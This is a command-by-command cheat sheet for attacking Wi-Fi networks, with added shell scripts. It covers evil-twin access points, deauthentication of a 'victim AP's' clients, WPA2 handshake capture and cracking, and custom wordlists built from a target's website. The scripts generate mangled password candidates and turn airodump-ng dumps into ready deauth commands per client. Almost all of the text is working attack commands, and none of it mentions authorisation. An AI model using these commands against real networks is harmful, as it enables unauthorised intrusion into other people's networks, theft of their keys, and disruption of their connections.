Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power (only where the regulatory domain allows it; the driver rejects values above the limit of the current iw reg setting)

  • iwconfig wlan0 txpower 27

Put the interface into monitor mode (creates wlan0mon; run airmon-ng check kill first if NetworkManager or wpa_supplicant keeps resetting the card)

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP (-c channel, -a BSSID to advertise, -e ESSID, -z 2 = WPA1/TKIP tag, -v verbose; the interface goes last)

  • airbase-ng -c 11 -a 20:34:67:24:89:76 -e FakeAP -v -z 2 wlan0mon

Create Evil Twin AP (-Z 4 = WPA2/CCMP tag; the ESSID must match the real network exactly, since it is mixed into the PMK that aircrack-ng later tests; clients that try to join send EAPOL message 2 in reply to airbase-ng's message 1, which is enough for aircrack-ng)

  • airbase-ng -a [victim AP MAC] -c 11 -Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP (-w takes a file prefix; the capture lands in rogueap-01.cap)

  • airodump-ng -c 11 --bssid [victim AP MAC] -w /root/Desktop/rogueap wlan0mon

Deauthentication (-0 2 = two deauth bursts; -0 0 keeps sending until stopped; omit -c to deauth every client of the AP)

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Aircrack

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt /root/Desktop/rogueap-01.cap

Custom wordlists

Using John

  • Download target site (two link levels deep)
    • # wget -r -l 2 www.<targetwebsite>.com
  • Produce unique token list
    • # grep -hr "" www.<targetwebsite>.com/ | tr '[:space:]' '\n' | sort -u > wordlist.lst
  • Clean list (drop tokens containing punctuation; a plain bracket expression, because the usual copy-pasted form with escaped alternatives turns [ and ] into a match for | instead)
    • # egrep -v '[],;{}<>:="/[]' wordlist.lst | sort -u > wordlist.clean.lst
  • Regenerate list w/ John (sort -u rather than uniq: uniq only removes adjacent duplicates, and rules applied to different words can produce the same candidate far apart)
    • # john --wordlist=wordlist.clean.lst --rules --stdout | sort -u > final.wordlist.lst
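The pipeline above, as an added example that is not part of the original notes: the same download, tokenise, clean, mangle steps run against a constructed HTML snippet instead of a wget mirror, so it works offline. It differs from the one-liners in two places: punctuation is stripped from tokens rather than discarding the whole token, and the final dedupe is sort -u. The mangling rules are a small sed/cut stand-in for john --rules --stdout (assumption: john is not installed where this runs); swap in the real john line for production use.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: wget -> tokenise -> clean -> mangle
# on a constructed page. Replace SAMPLE_HTML with the mirrored files for a real run:
#   SAMPLE_HTML=$(find www.<targetwebsite>.com -type f -exec cat {} +)

# Constructed sample page (stand-in for the wget -r mirror).
SAMPLE_HTML='<html><head><title>Acme Widgets - Home</title></head>
<body><h1>Welcome to Acme Widgets</h1>
<p>Founded 1987 in Springfield. Contact: sales@acme.example, "Widgets" &amp; more!</p>
<a href="/about">About Acme</a> <span class="x">Springfield</span></body></html>'

# site_words: one unique token per line, 4+ characters, HTML tags and punctuation removed
site_words() {
  printf '%s\n' "$SAMPLE_HTML" |
    sed 's/<[^>]*>/ /g' |                     # drop HTML tags (markup, not content)
    tr '[:space:]' '\n' |                     # one token per line
    sed 's|[],;{}<>:="/()!?&.@[-]||g' |        # strip the characters the notes filter on
    grep -E '^.{4,}$' |                       # drop empties and very short tokens
    sort -u
}

# mangle: each word as-is, lowercased, capitalised, and with common suffixes
# (stand-in for john --rules); sort -u at the end because rules applied to
# different words can collide, and uniq alone would miss non-adjacent repeats
mangle() {
  site_words | while read -r w; do
    lw=$(printf '%s' "$w" | tr '[:upper:]' '[:lower:]')
    cw=$(printf '%s' "$lw" | cut -c1 | tr '[:lower:]' '[:upper:]')$(printf '%s' "$lw" | cut -c2-)
    printf '%s\n' "$w" "$lw" "$cw" "${w}1" "${cw}123" "${cw}!"
  done | sort -u
}

# Usage: write the candidates and report how many there are
mangle > final.wordlist.lst
echo "$(wc -l < final.wordlist.lst | tr -d ' ') candidates in final.wordlist.lst"
```

With the 11 tokens the sample page yields, the six rules produce a few dozen candidates; on a real mirror the site_words count is what tells you whether -l 2 pulled in enough text before you spend time on the mangling step.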

Using Crunch

Syntax: crunch <min> <max> [<charset>] [-f <charset file> <charset name>] [-t <pattern>] [-o <output file>]

  • Upper- and lowercase letters only (mixalpha), exactly 8 characters; use mixalpha-numeric for letters and digits (crunch ships the same charset list as /usr/share/crunch/charset.lst)
    • # crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/alphawordlist.lst
  • 10 characters with the last four fixed and the first six variable (@ = lowercase letter; use , for uppercase, % for digits, ^ for symbols): 26^6, about 309 million candidates
    • # crunch 10 10 -t @@@@@@0728 -o /root/birthdaywordlist.lst
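A small pure-shell expander for crunch-style -t masks, added here as an example that is not part of the original notes or of crunch itself. It lets you check what a pattern means and how many candidates it produces before crunch writes them to disk. The placeholders follow crunch's -t syntax (@ lowercase, , uppercase, % digit, ^ symbol); the symbol set is a reduced stand-in chosen for the demo (assumption), crunch's own ^ set is larger.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: expand and size crunch-style masks.

LOWER=abcdefghijklmnopqrstuvwxyz
UPPER=ABCDEFGHIJKLMNOPQRSTUVWXYZ
DIGIT=0123456789
SYMBOL='!#$%&*+-=?_'   # 11 symbols, reduced demo set (assumption; crunch uses more)

# charset_for <mask-char>: the candidate characters for one mask position
charset_for() {
  case "$1" in
    @) printf '%s' "$LOWER" ;;
    ,) printf '%s' "$UPPER" ;;
    %) printf '%s' "$DIGIT" ;;
    ^) printf '%s' "$SYMBOL" ;;
    *) printf '%s' "$1" ;;      # anything else is a literal
  esac
}

# mask_size <mask>: number of candidates the mask expands to, without generating them
mask_size() {
  mask=$1; i=1; total=1
  while [ "$i" -le "${#mask}" ]; do
    chars=$(charset_for "$(printf '%s' "$mask" | cut -c"$i")")
    total=$((total * ${#chars}))
    i=$((i + 1))
  done
  echo "$total"
}

# expand_mask <mask>: every candidate, one per line, in crunch's order
# (the list grows one mask position at a time; the cross product is done in awk)
expand_mask() {
  mask=$1; i=1
  cur=$(mktemp); nxt=$(mktemp)
  printf '\n' > "$cur"                       # start from a single empty prefix
  while [ "$i" -le "${#mask}" ]; do
    chars=$(charset_for "$(printf '%s' "$mask" | cut -c"$i")")
    awk -v set="$chars" '{ n = split(set, a, ""); for (j = 1; j <= n; j++) print $0 a[j] }' "$cur" > "$nxt"
    tmp=$cur; cur=$nxt; nxt=$tmp
    i=$((i + 1))
  done
  cat "$cur"; rm -f "$cur" "$nxt"
}

# Usage: size the birthday mask from the notes, then show the tail of a smaller one
echo "@@@@@@0728 expands to $(mask_size '@@@@@@0728') candidates"
expand_mask '@@%0728' | tail -n 3
```

mask_size is the check worth running first: six lowercase positions are 26^6 candidates, and each extra @ multiplies the list by 26, which is the difference between a file you can keep and one you should generate on the fly with crunch piped straight into aircrack-ng -w -.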

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill (kills NetworkManager, wpa_supplicant and similar processes that would keep resetting the card; run it if the interface misbehaves once in monitor mode)
  2. Put the interface into monitor mode (creates wlan0mon)
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake wlan0mon (-w takes a file prefix; the capture lands in wpa2handshake-01.cap)
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake wlan0mon (alternative if airodump-ng complains that the fixed channel is -1)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3 wlan0mon (-c is the client MAC address; omit it to broadcast the deauth to every client)
    2. Wait for "WPA handshake: [router bssid]" to appear in the airodump-ng header
  6. Crack handshake (-a 2 = WPA-PSK)
    1. # aircrack-ng -a 2 -b [router bssid] -w [path to wordlist] /root/Desktop/wpa2handshake-01.cap
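Choosing the target AP and its clients is the step both procedures above (the Evil Twin capture and the WPA2 handshake capture) do by hand from the airodump-ng screen. The script below is an added example, not part of the original notes or of the aircrack-ng suite: it reads the <prefix>-01.csv that airodump-ng writes next to the .cap, looks up the BSSID and channel for an ESSID, lists the stations actually associated with it (probing-only stations cannot be deauthenticated), and prints the matching airodump-ng and aireplay-ng lines. The CSV is constructed sample data laid out like airodump-ng's CSV output; replace SAMPLE_CSV with the contents of a real dump to use it.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: pick target AP and clients out of
# an airodump-ng CSV dump and print the capture + deauth commands.
# For a real run: SAMPLE_CSV=$(cat /root/Desktop/wpa2handshake-01.csv)

# Constructed sample dump in airodump-ng's CSV layout (AP table, blank line, station table).
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -41, 312, 0, 0.  0.  0.  0, 8, VictimAP,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -70, 88, 0, 0.  0.  0.  0, 7, OtherAP,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:10, 2024-01-01 10:04:59, -50, 120, 00:11:22:33:44:55, VictimAP
AA:BB:CC:DD:EE:02, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -63, 15, (not associated), VictimAP,OtherAP
AA:BB:CC:DD:EE:03, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -55, 40, 00:11:22:33:44:55,
AA:BB:CC:DD:EE:04, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -58, 9, 66:77:88:99:AA:BB, OtherAP'

# ap_info <essid>: prints "<bssid> <channel>" for the AP advertising that ESSID
ap_info() {
  printf '%s\n' "$SAMPLE_CSV" | awk -F', *' -v essid="$1" '
    /^Station MAC/ { exit }                         # AP table ends here
    /^BSSID/       { next }                         # column header
    NF >= 14 && $14 == essid { print $1, $4; exit } # BSSID and channel columns'
}

# clients_of <bssid>: station MACs currently associated with that BSSID.
# Rows whose BSSID column reads "(not associated)" are only probing and are skipped.
clients_of() {
  printf '%s\n' "$SAMPLE_CSV" | awk -F', *' -v bssid="$1" '
    /^Station MAC/ { insta = 1; next }
    insta && $6 == bssid { print $1 }'
}

# attack_plan <essid> [iface]: one airodump-ng capture line on the AP's channel,
# then one targeted aireplay-ng deauth per associated client
attack_plan() {
  essid=$1; iface=${2:-wlan0mon}
  info=$(ap_info "$essid")
  [ -n "$info" ] || { echo "no AP with ESSID '$essid' in the dump" >&2; return 1; }
  set -- $info
  bssid=$1; ch=$2
  echo "airodump-ng -c $ch --bssid $bssid -w /root/Desktop/wpa2handshake $iface"
  clients_of "$bssid" | while read -r sta; do
    echo "aireplay-ng -0 2 -a $bssid -c $sta $iface"
  done
}

# Usage
attack_plan VictimAP wlan0mon
```

The printed lines are meant to be reviewed, not piped into a shell: the deauth must run on the same channel the capture is locked to, and a station that moved to "(not associated)" between two dumps is one you will not get a handshake from no matter how many bursts you send.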